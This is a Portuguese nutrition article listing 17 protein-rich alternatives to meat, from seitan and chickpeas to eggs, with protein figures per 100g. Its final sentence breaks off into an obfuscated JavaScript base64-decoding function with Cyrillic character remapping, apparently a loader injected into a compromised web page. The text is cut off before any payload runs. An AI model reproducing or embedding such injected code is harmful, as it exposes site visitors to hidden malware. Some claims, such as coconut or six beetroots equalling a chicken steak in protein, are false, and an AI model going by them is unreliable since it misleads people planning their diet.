Dicas de nutrição: 17 alternativas saudáveis à carne
Ao tentarmos reduzir o consumo de carne, torna-se fundamental encontrar outras fontes de proteína. Se formos vegetarianos, podemos optar até por consumir apenas proteína vegetal. Ao conjugar vários alimentos diferentes na mesma refeição conseguimos ter a quantidade certa de proteína necessária ao bom funcionamento do nosso corpo. Não é difícil. Veja esta lista de alimentos que estão repletos de proteína e inspire-se nas maneiras de os apresentar no prato.
1- SEITAN:
Cada 100g contém praticamente 75g de proteína.
Uma nota: quem é intolerante ao glúten deve ter a máxima atenção, uma vez que o seitan é produzido através do trigo.
2- SOJA:
A soja é um alimento muito usado pelos vegetarianos. Cada 100g de grãos de soja contém 34g de proteína.
3- AMÊNDOAS:
Os frutos secos são uma excelente fonte de proteína. No caso das deliciosas amêndoas por cada 100g, 21,1g são proteína!
4- AMENDOINS:
Também os amendoins são das melhores fontes de proteína. Em 100g encontra 26g de proteína.
5- FEIJÃO:
O feijão é um excelente alimento e não é novidade que é uma rica fonte de proteína. 100g = 6,6g proteína.
6- GRÃO DE BICO:
Em cada 100g de grão de bico, uma leguminosa maravilhosa, encontra 23g de proteína. UAU!
7- LENTILHAS:
As lentilhas, que vão tão bem em purés, contêm cerca de 9g de proteína por cada 100g.
8- ERVILHAS:
Se não come muitas ervilhas, passe a inclui-las nos seus pratos. É que em 100g de ervilhas quase 6g são proteína.
9- LINHAÇA, SEMENTES DE ABÓBORA ou de GIRASSOL
São riquíssimas em proteína. A CHIA por exemplo, contém cerca de 17g de proteína por cada 100g.
10- QUINOA:
Sou (saudavelmente) viciada neste cereal. Um dos muitos benefícios é que tem 15g de proteína por cada 100g.
11- ARROZ INTEGRAL:
Leva mais tempo a cozinhar, mas o sabor é delicioso! E cai lindamente no estômago! Por cada 100g tem 2,5g de proteína. Combine com frutos secos e obtenha ainda mais proteína. É uma boa dica!
12- AVEIA:
Sabe tão bem ao pequeno almoço! Tem cerca de 3g de proteína por porção.
13- ABACATE:
Este é sem dúvida dos meus frutos preferidos! E cada 100g possui cerca de 2g de proteínas.
14- COCO:
É conhecido como carne branca! E aqui está a razão… Cada 80g de coco corresponde a um bife de frango no que diz respeito a proteína! Espetacular, não acha?
15- ESPINAFRES:
O Popeye é que tinha razão! Cada 100g de espinafres contêm 2,9g de proteína!
16- BETERRABA:
6 beterrabas pequenas são o equivalente a um bife de frango, no que à proteína diz respeito.
17- OVOS:
São proteínas de origem animal mas uma excelente alternativa ao consumo de carne. E são riquíssimos em proteína (13 gramas por cada 100 gramas).
Se gostou de conhecer estas alternativas saudáveis à carne, conheça também fontes de cálcio alternativas ao leite. Descubra ainda todos os benefícios do abacate e do function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa